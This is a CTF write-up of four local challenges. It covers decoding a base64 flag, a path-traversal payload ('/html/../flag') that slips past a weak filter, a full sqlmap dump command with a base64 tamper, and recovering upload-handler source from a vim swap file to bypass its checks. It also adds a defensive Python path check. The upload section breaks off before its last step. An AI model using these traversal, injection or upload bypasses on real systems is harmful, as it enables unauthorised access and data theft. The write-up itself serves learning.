CTF

Junyangz, November 20, 2017

Si... sign-in challenge?

What do you want? Tell me.

http://127.0.0.1:30004

  1. input 'flag'
  2. get ZmxhZ3tXZWxDMG1lX3RvX2N0ZjJ9
  3. base64-decode ZmxhZ3tXZWxDMG1lX3RvX2N0ZjJ9
  4. get "flag{WelC0me_to_ctf2}"

Fi... file inclusion?

Hehe, I'm the flag, come include me~~

http://127.0.0.1:30005/page.php

  1. Index page
    shows "This index page" and a link to "another page"

  2. Another page
    shows "This is another page / But nothing" and a link back to the index page

  3. observe the `file` parameter in the URL and bypass its check

    • inspect the page source
    • find:

      john@ubuntu:/var/www$ tree
      .
      ├── flag
      └── html
          ├── page.php
          ├── index
          ├── another
      <!--
      if (strpos($file_path, ".") === 0 || substr_count($file_path, "..") > 2) {
        echo "<p>malicious parameter</p>";
      }

    • construct a path that passes the check (does not start with '.', uses only one '..') but still climbs out of html:
      http://127.0.0.1:30005/page.php?file=/html/../flag

  4. get flag

    flag{Bypass_File_Path_Check}
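As an added illustration (not code from the writeup or the challenge), the following Python re-implements the logic of the page.php filter shown above next to a canonicalising check, and shows where each request value actually resolves. It assumes the server prefixes the `file` parameter with /var/www, matching the tree output; the page does not state this.

```python
import posixpath

# Constructed layout matching the tree output in the writeup: the flag sits in
# /var/www, one level above the document root /var/www/html.
WEB_ROOT = "/var/www"
DOC_ROOT = posixpath.join(WEB_ROOT, "html")


def weak_check(file_path: str) -> bool:
    """Same logic as the page.php filter: reject a value that begins with '.'
    or contains more than two '..' sequences. A single '..' gets through."""
    return not (file_path.startswith(".") or file_path.count("..") > 2)


def served_path(file_path: str) -> str:
    """Assumption (not stated on the page): the server prefixes the parameter
    with WEB_ROOT before including it. normpath shows where that really lands."""
    return posixpath.normpath(WEB_ROOT + "/" + file_path.lstrip("/"))


def hardened_check(file_path: str) -> bool:
    """Canonicalise first, then require the result to stay inside DOC_ROOT.
    Pure string normalisation keeps this runnable offline; a real handler should
    also resolve symlinks with os.path.realpath before comparing."""
    target = served_path(file_path)
    return target == DOC_ROOT or target.startswith(DOC_ROOT + "/")


def evaluate(file_path: str) -> dict:
    """Show both verdicts side by side for one request value."""
    return {
        "file": file_path,
        "resolves_to": served_path(file_path),
        "weak_filter_allows": weak_check(file_path),
        "hardened_filter_allows": hardened_check(file_path),
    }


if __name__ == "__main__":
    for value in ("/html/index", "/html/../flag", "../flag", "/html/../../../../flag"):
        print(evaluate(value))
```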

S... SQL injection?

I heard the value column of the flag table has something good in it...

http://127.0.0.1:30006/?id=MQ==

  1. base64-decode "MQ==" = 1

  2. use sqlmap

     sqlmap.py -u "http://127.0.0.1:30006/?id=NA==" --tamper base64encode.py -b --current-user --current-db --tables --columns --dump-all
    
  3. standard sqlmap enumeration and dump

  4. get flag

    flag{Have_Fun_In_SQL_Injection}

Upload and get flag

I heard that a sudden power cut while editing a file leaves a swp file behind~

http://127.0.0.1:30007/

http://127.0.0.1:30007/index.php
http://127.0.0.1:30007/.index.php.swp

curl -o .index.php.swp http://127.0.0.1:30007/.index.php.swp
vim -r .index.php.swp
if ($_FILES){
    if ($_FILES["file"]["error"] > 0)
    {
        echo "Error: " . $_FILES["file"]["error"] . "<br />";
    }
    else
    {
        // "type" is the Content-Type the client sent with the upload, so it
        // can be set to anything; this only stops accidental uploads.
        if ($_FILES["file"]["type"] !== "image/jpeg"){
            die("stop hacking!");
        }
        if ($_FILES["file"]["size"] / 1024 > 2048){
            die("size too big!");
        }
        // Only the first two bytes are inspected: 255216 is FF D8 (JPEG),
        // 13780 is 89 50 (PNG). Nothing after them is ever looked at.
        $file_tmp = fopen($_FILES["file"]["tmp_name"], 'rb');
        $bin = fread($file_tmp, 2);
        fclose($file_tmp);
        $data = unpack('C2chars', $bin);
        $type_code = intval($data['chars1'].$data['chars2']);
        $flag = 0;
        switch ($type_code) {
            case 255216:
                $fileType = 'jpg';
                $flag = 1;
                break;
            case 13780:
                $fileType = 'png';
                $flag = 1;
                break;
            default:
                $fileType = 'unknown';
                die("error file head!");
                break;
        }
        if ($flag === 1){
            // Stored name is md5(original name) plus the original extension,
            // so it is predictable from the uploaded filename alone.
            $filetype = substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.'));
            $filename = md5($_FILES["file"]["name"]) . $filetype;
            // A .php extension does not store the upload at all: the flag
            // file itself is copied to that predictable name instead.
            if (strtolower($filetype) === ".php"){
                copy('../flag', $filename);
            }else{
                move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            }
            echo "<h1>成功</h1>";   // "Success"
        }
    }
}

Summary

  1. upload a PHP file

    • use Burp Suite to change the filename from Junyangz.jpg to Junyangz.php (only the filename is changed, so the MIME and header checks still pass)
  2. get the file location

    • recover index.php from .index.php.swp
    • the stored file name is:

      $filename = md5($_FILES["file"]["name"]) . $filetype;

    • md5("Junyangz.php") = f0480f39a6cb1a1ff5f55021ac0824f7
    • so the copied flag is stored as f0480f39a6cb1a1ff5f55021ac0824f7.php
  3. get flag: